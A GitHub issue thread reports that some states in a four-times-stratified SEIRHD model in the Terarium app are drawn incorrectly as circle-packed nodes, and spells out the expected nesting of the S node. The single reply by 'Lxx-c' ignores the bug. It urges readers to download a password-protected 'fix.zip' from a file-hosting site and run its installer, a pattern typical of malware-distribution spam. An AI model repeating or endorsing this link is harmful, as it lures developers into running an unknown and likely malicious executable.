### ISSUE TITLE
[BUG]: Some states in a multi-stratified model are not shown correctly as circle-packed nodes

### ISSUE THREAD

**Issue by liunelson** [DARPA-ASKEM/terarium#4578]
**Describe the bug**

I have this model:
https://app.staging.terarium.ai/projects/34e7b955-f408-4e8b-be27-9429480ad6aa/model/7508b278-caea-4d35-bb17-097bdd463f07

It was created by stratifying a base SEIRHD model 4 times consecutively:
1. only the S node, by "vaccination", over two strata ("unvaccinated", "vaccinated")
2. only the S_vaccinated node, by "vaccine", over three strata ("pfizer", "moderna", "jj")
3. only the S_vaccinated_pfizer and S_vaccinated_moderna nodes, by "dose", over three strata ("one", "two", "diff")
4. all nodes except D, by "age", over three strata ("0to9", "10to19", "20above")

**Expected behavior**
Since the nodes of this model do not have the same stratification _depth_, I expected to see some nodes like E, I, R, H to have two levels (correct) and D have one (correct), while the S node have more complex structure.

The S node should have 5 levels:
```
S = [S]
   = [[S_unvaccinated, S_vaccinated]]
   = [[S_unvaccinated, S_vaccinated = [S_vaccinated_jj, S_vaccinated_pfizer, S_vaccinated_moderna]]]
   = [[S_unvaccinated, [S_vaccinated_jj, [S_vaccinated_pfizer_one, S_vaccinated_pfizer_two, S_vaccinated_pfizer_diff], [S_vaccinated_moderna_one, S_vaccinated_moderna_two, S_vaccinated_diff]]]]
   = [[[S_unvaccinated_0to9, S_unvaccinated_10to19, S_vaccinated_20above], [[S_vaccinated_jj_10to19, S_vaccinated_jj_20above]], [[S_vaccinated_pfizer_one_10to19, S_vaccinated_pfizer_one_20above], [[S_vaccinated_pfizer_two_10to19, ...], [S_vaccinated_pfizer_diff_10to19, ...]], [[S_vaccinated_moderna_one_10to19, ...], [...], [...]], [[S_vaccinated_moderna_diff_10to19, ...], [...], [...]]]]]
```

**Screenshots**
Current incorrect:
![Screenshot 2024-08-26 at 11 15 15 AM](https://github.com/user-attachments/assets/e8a9a939-a647-4cc9-93d8-dd1edc2408c7)

Sketch of the correct structure of each state node
![Screenshot 2024-08-26 at 11 31 30 AM](https://github.com/user-attachments/assets/42a17019-dd8b-48cf-8a60-fb8a0ce0032e)

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
